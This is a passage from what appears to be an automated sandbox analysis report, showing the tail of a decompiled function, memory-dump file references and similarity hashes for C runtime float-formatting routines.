                                                                                                                                                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%